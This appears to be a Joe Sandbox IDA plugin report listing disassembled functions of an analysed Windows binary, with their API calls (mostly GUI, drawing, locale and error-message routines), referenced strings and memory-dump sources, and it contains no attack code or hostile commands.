Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00409E60, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50

APIs

Part of subcall function 00409CD8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
Part of subcall function 00409CD8: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 00409EA0
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?), ref: 00409EA6
GetStdHandle.KERNEL32(000000F5,00409F10,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 00409EBB
WriteFile.KERNEL32(00000000,000000F5,00409F10,00000002,?), ref: 00409EC1
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 00409EE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00409EF9

Strings

H@F, xrefs: 00409E74
\s@, xrefs: 00409ECF

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00436BAC, Relevance: 13.6, APIs: 9, Instructions: 150

APIs

MulDiv.KERNEL32(?,?,?), ref: 00436BE5
MulDiv.KERNEL32(?,?,?), ref: 00436BFF
MulDiv.KERNEL32(?,?,?), ref: 00436C2D
MulDiv.KERNEL32(?,?,?), ref: 00436C43
MulDiv.KERNEL32(?,?,?), ref: 00436C7B
MulDiv.KERNEL32(?,?,?), ref: 00436C93
MulDiv.KERNEL32(?,?,0000001F), ref: 00436CDD
MulDiv.KERNEL32(?,?,0000001F), ref: 00436D06

Part of subcall function 0041ED20: MulDiv.KERNEL32(00000000,00000048,?,?), ref: 0041ED31

MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436D2C

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00437A40, Relevance: 13.6, APIs: 9, Instructions: 122

APIs

GetDesktopWindow.USER32 ref: 00437A77
GetDCEx.USER32(?,00000000,00000402), ref: 00437A8A

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

SelectObject.GDI32(?,00000000), ref: 00437AAD
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AD3
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AF5
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,?,?,00000000,?,005A0049,?,?,?,?), ref: 00437B14
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?,?,00000000), ref: 00437B2E
SelectObject.GDI32(?,?), ref: 00437B3B
ReleaseDC.USER32(?,?), ref: 00437B55

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040ACCC, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040AB58: GetThreadLocale.KERNEL32 ref: 0040AB82
Part of subcall function 0040AB58: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000004A), ref: 0040AC77
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040981C: GetThreadLocale.KERNEL32(00000000,0040992F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409838

GetThreadLocale.KERNEL32(00000000,0040AF97,?,?,00000000,00000000), ref: 0040AD02

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Part of subcall function 004097B8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Part of subcall function 00409AA4: GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 004099F4: GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Strings

:mm, xrefs: 0040AF35
AMPM , xrefs: 0040AF25
mmmm d, yyyy, xrefs: 0040ADFE
:mm:ss, xrefs: 0040AF52
m/d/yy, xrefs: 0040ADD1
AMPM, xrefs: 0040AF16

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00456E3C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132

APIs

GetActiveWindow.USER32 ref: 00456E4F
GetWindowRect.USER32(?,?), ref: 00456EA9
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456EE1

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

MessageBoxA.USER32(?,?,?,?), ref: 00456F22
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456F72

Part of subcall function 0044DE40: IsWindow.USER32(?), ref: 0044DE4E
Part of subcall function 0044DE40: EnableWindow.USER32(?,000000FF), ref: 0044DE5D

SetActiveWindow.USER32(?), ref: 00456F83

Strings

(, xrefs: 00456E86

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004225B6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004225B8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041B680, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89

APIs

GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Strings

0@F, xrefs: 0041B68E
H#A, xrefs: 0041B6B2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00426864, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004268BC
GetSystemMetrics.USER32(00000000), ref: 004268D1
GetSystemMetrics.USER32(00000001), ref: 004268DC
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426906

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

GetMonitorInfoW, xrefs: 0042687C
dhB, xrefs: 00426881, 0042688E, 00426895
DISPLAY, xrefs: 004268FD

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004266BC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68

APIs

GetMonitorInfoA.USER32(?,?), ref: 004266ED
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426714
GetSystemMetrics.USER32(00000000), ref: 00426729
GetSystemMetrics.USER32(00000001), ref: 00426734
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042675E

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

DISPLAY, xrefs: 00426755
GetMonitorInfo, xrefs: 004266D4

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00401B18, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,i ), ref: 00401B45
LocalFree.KERNEL32 ref: 00401B57
VirtualFree.KERNEL32(?,00000000,00008000,0020BBB0,00000000,i ), ref: 00401B76
LocalFree.KERNEL32 ref: 00401BB5
RtlLeaveCriticalSection.KERNEL32(004645C4,00401BF5,0020BBB0,00000000,i ), ref: 00401BDE
RtlDeleteCriticalSection.KERNEL32(004645C4,00401BF5,0020BBB0,00000000,i ), ref: 00401BE8

Strings

i , xrefs: 00401B2C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004040B8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0045BD1C,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F,?,00000000), ref: 004040F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0045BD1C), ref: 004040F7
GetStdHandle.KERNEL32(000000F5,00404140,00000002,0045BD1C,00000000,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F), ref: 0040410C
WriteFile.KERNEL32(00000000,000000F5,00404140,00000002,0045BD1C), ref: 00404112
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404130

Strings

Error, xrefs: 00404124
Runtime error at 00000000, xrefs: 004040EA, 00404129

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00444488, Relevance: 12.2, APIs: 8, Instructions: 170

APIs

6D37D9B4.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 004444E7

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

6D37D9B4.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00444588
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004445D5
SetBkColor.GDI32(00000000,00000000), ref: 004445DD
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00444602
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00444623
SetBkColor.GDI32(00000000,00000000), ref: 0044462B
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0044464E

Part of subcall function 00444460: 6D384419.COMCTL32(00000000,?,004444C1,00000000,?), ref: 00444476

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0042ECEC, Relevance: 12.1, APIs: 8, Instructions: 146

APIs

GetDC.USER32(00000000), ref: 0042ED16

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

SelectObject.GDI32(00000000,00000000), ref: 0042ED27
GetTextMetricsA.GDI32(00000000,?), ref: 0042ED33
SelectObject.GDI32(00000000,00000000), ref: 0042ED3A
ReleaseDC.USER32(00000000,00000000), ref: 0042ED42
BeginDeferWindowPos.USER32(00000000), ref: 0042ED9A
DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EE41
EndDeferWindowPos.USER32(?), ref: 0042EE6F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00453978, Relevance: 12.1, APIs: 8, Instructions: 138

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetCapture.USER32(00000000,00453C08), ref: 004539EE
GetCapture.USER32(0000001F,00000000,00000000,00000000,00453C08), ref: 004539FD
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00453A03
ReleaseCapture.USER32 ref: 00453A08
GetActiveWindow.USER32 ref: 00453A17

Part of subcall function 00454DE0: GetCursorPos.USER32 ref: 00454DFB
Part of subcall function 00454DE0: WindowFromPoint.USER32(?,?), ref: 00454E08
Part of subcall function 00454DE0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
Part of subcall function 00454DE0: GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
Part of subcall function 00454DE0: SetCursor.USER32(00000000), ref: 00454E5F

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00453AAD
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453B14
GetActiveWindow.USER32 ref: 00453B23

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043B768, Relevance: 12.1, APIs: 8, Instructions: 123

APIs

SaveDC.GDI32 ref: 0043B77E

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B79F
GetWindowLongA.USER32(00000000,000000EC), ref: 0043B7B5
GetWindowLongA.USER32(00000000,000000F0), ref: 0043B7D7

Part of subcall function 0043B768: SetRect.USER32(?,00000000,00000000,?,?), ref: 0043B803
Part of subcall function 0043B768: DrawEdge.USER32(?,?,?,00000000), ref: 0043B812
Part of subcall function 0043B768: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B837

RestoreDC.GDI32(?,?), ref: 0043B8A8

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420380, Relevance: 12.1, APIs: 8, Instructions: 79

APIs

GetDC.USER32(00000000), ref: 004203AE
GetDeviceCaps.GDI32(?,00000068), ref: 004203CA
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004203E9
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042040D
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042042B
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042043F
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042045F
ReleaseDC.USER32(00000000,?), ref: 00420477

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044AB04, Relevance: 10.9, APIs: 7, Instructions: 405

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0044B019

Part of subcall function 00449EB0: SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00449F36
Part of subcall function 00449EB0: DrawMenuBar.USER32(00000000), ref: 00449F47

GetSubMenu.USER32(?,?), ref: 0044AC00

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 0044ADD3
RestoreDC.GDI32(?,?), ref: 0044AE47
GetWindowDC.USER32(?), ref: 0044AEC1
SaveDC.GDI32(?), ref: 0044AEF8
RestoreDC.GDI32(?,?), ref: 0044AF65

Part of subcall function 0044A6F4: GetMenuItemCount.USER32(?), ref: 0044A720
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A740
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A7D7

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00446B64, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187

APIs

GetVersion.KERNEL32(00000000,00446DBF), ref: 00446C00
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00446D10
InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00446D9C

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00446D83

Strings

?, xrefs: 00446C1B
,, xrefs: 00446C14

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420970, Relevance: 10.7, APIs: 7, Instructions: 166

APIs

Part of subcall function 00420628: GetDC.USER32(00000000), ref: 00420672
Part of subcall function 00420628: CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004206B9
Part of subcall function 00420628: DeleteObject.GDI32(?), ref: 004206F4

GetObjectA.GDI32(?,00000018,?), ref: 00420A62
GetObjectA.GDI32(?,00000018,?), ref: 00420A71
GetBitmapBits.GDI32(?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?,?), ref: 00420AC2
GetBitmapBits.GDI32(?,?,?,?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?), ref: 00420AD0
DeleteObject.GDI32(?), ref: 00420AD9
DeleteObject.GDI32(?), ref: 00420AE2
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420B04

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
